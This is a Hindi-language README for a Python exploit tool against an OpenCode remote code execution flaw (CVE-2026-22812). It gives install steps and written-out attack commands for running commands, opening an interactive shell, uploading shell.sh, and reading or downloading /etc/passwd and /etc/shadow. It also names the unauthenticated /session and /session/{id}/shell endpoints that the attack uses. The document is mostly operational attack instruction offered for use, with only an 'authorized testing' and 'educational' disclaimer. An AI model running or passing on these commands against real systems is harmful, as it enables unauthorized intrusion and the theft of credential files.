
Python exploit टूल OpenCode RCE (CVE-2026-22812) के लिए, जो कमांड निष्पादन, फ़ाइल पढ़ने/लिखने/अपलोड/डाउनलोड, और अधिकृत पेनिट्रेशन टेस्टिंग के लिए इंटरैक्टिव शेल प्रदान करता है।
OpenCode रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता के लिए एक Python शोषण उपकरण, जो v1.0.216 से पहले के संस्करणों को प्रभावित करता है। यह उपकरण कई हमले वेक्टर प्रदान करता है, जिनमें कमांड निष्पादन, फ़ाइल पढ़ना/लिखना, फ़ाइल अपलोड/डाउनलोड और इंटरैक्टिव शेल शामिल हैं।
⚠️ केवल अधिकृत परीक्षण के लिए ⚠️
# रिपॉजिटरी क्लोन करें
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# निर्भरताएं स्थापित करें
pip install requests urllib3
# निष्पादन योग्य बनाएं (वैकल्पिक)
chmod +x CVE-2026-22812.py
requests लाइब्रेरीurllib3 लाइब्रेरीpython3 CVE-2026-22812.py -t http://target:port [options]
# जांचें कि लक्ष्य भेद्य है या नहीं
python3 exploit.py -t http://10.0.0.1:4096 --check
# इंटरैक्टिव शेल
python3 exploit.py -t http://10.0.0.1:4096 -i
# एकल कमांड निष्पादित करें
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# फ़ाइल पढ़ें
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# फ़ाइल अपलोड करें
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# फ़ाइल डाउनलोड करें
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# सिस्टम जानकारी प्राप्त करें
python3 exploit.py -t http://10.0.0.1:4096 --info
# प्रॉक्सी का उपयोग करें (Burp Suite, आदि)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
इंटरैक्टिव शेल (-i फ्लैग) में एक बार, आप उपयोग कर सकते हैं:
<command> शेल कमांड निष्पादित करें
help सहायता मेनू दिखाएं
exit शेल से बाहर निकलें
session सत्र आईडी दिखाएं
stats शोषण आंकड़े दिखाएं
read <file> फ़ाइल सामग्री पढ़ें
download <remote> <local> फ़ाइल डाउनलोड करें
upload <local> <remote> फ़ाइल अपलोड करें
sysinfo सिस्टम जानकारी प्राप्त करें
भेद्यता सत्र प्रबंधन एंडपॉइंट (/session) में मौजूद है, जो बिना प्रमाणीकरण के उपयोगकर्ताओं को सत्र बनाने और /session/{id}/shell एंडपॉइंट के माध्यम से मनमाने कमांड निष्पादित करने की अनुमति देता है।
POST /session - सत्र बनाएंPOST /session/{id}/shell - कमांड निष्पादित करेंGET /file/content - फ़ाइलें पढ़ेंCVE-2026-22812.py
├── Colors class (ANSI रंग कोड)
├── print_banner() (बैनर प्रदर्शित करें)
├── Exploit class (मुख्य शोषण तर्क)
│ ├── __init__() (आरंभीकरण)
│ ├── check_vuln() (भेद्यता जांच)
│ ├── create_session() (सत्र बनाएं)
│ ├── exec_cmd() (कमांड निष्पादित करें)
│ ├── read_file() (फ़ाइल पढ़ें)
│ ├── write_file() (फ़ाइल लिखें)
│ ├── upload() (फ़ाइल अपलोड करें)
│ ├── download() (फ़ाइल डाउनलोड करें)
│ ├── get_info() (सिस्टम जानकारी)
│ ├── shell() (इंटरैक्टिव शेल)
│ └── सहायक विधियां
└── main() (तर्क पार्सिंग)
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए जारी किया गया है। अपने जोखिम पर उपयोग करें।
समस्याओं और प्रश्नों के लिए, कृपया: